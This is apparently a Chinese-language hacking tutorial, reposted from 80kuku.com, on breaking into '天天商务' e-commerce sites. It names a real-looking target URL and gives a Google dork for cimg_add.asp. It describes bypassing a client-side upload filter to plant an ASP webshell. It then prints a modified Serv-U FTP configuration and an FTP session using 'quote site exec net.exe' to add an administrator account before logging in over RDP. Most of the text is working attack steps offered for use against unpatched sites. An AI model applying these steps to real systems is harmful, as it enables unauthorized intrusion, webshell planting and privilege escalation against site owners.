其它很多商务网站都是用这个修改的,原来都是一样,简单入侵……
上传漏洞太流行了,今天无聊网上找了一下上传利用的教程,怎么找来找去没有发现有天天商务的本地提交,cimg_save.asp也没有限制文件格式的上传利用,好几个月前我就发现了,可是网上一查怎么还是一堆没有打补丁的……
去找一下……
http://www.google.com/search?hl=zh-CN&ie=UTF-8&q=cimg_add.asp&btnG=Google%E6%90%9C%E7%B4%A2&lr=
就第一个吧http://qiye.sz.js.cn/manage/qyml/
上传
打开上传的网页(这个网页本来加了一个脚本限制上传文件格式,所以只要去掉然后把你要上传的地址真上去就可以了,比动网上传利用还要快…………^_^)
文件已经成功上传,是否继续添加……
F:\ASP木马\20041014144547.asp (29K) 上传 成功!
这个上传程序写入的目录是在PIC/后面
OK
提升权限
找到了他的Serv-U FTP SERVER那就好办了,看看有没有写入修改的权限,太可怜了,有写入的权限
加一个系统权限的用户
这个可能大家都已经非常利害了,我就不多说了……
User0=webasp|1|0
SKEYValues=
[USER=webasp|1]
Password=no7C154C45EDA5D0AABBC7DD93B0AEB078
HomeDir=c:\\
TimeOut=600
Maintenance=System
Access1=C:\|RWAMELCDP
SKEYValues=
ftp>open ip
Connected to ip.
220 Serv-U FTP Server v4.1.0.0 for WinSock ready...
User (ip:(none)): id //输入构造的用户
331 User name okay, please send complete E-mail address as password.
Password:password //密码
230 User logged in, proceed.
ftp> cd winnt //进入win2k的winnt目录,如果是winxp或者是windows server 2003就应该为windows目录。
250 Directory changed to /WINNT
ftp>cd system32 //进入system32目录
250 Directory changed to /WINNT/system32
ftp>quote site exec net.exe user 用户名 密码 /add //利用系统的net.exe文件加用户。
200 EXEC command successful (TID=33).
ftp>quote site exec net.exe localhost administrators 用户名 /add //提升为超级用户
看看有没有终端……哈哈,漏洞太多了……惨,直接就用3389进系统吧……
商务网站入侵和利用
80酷酷网 80kuku.com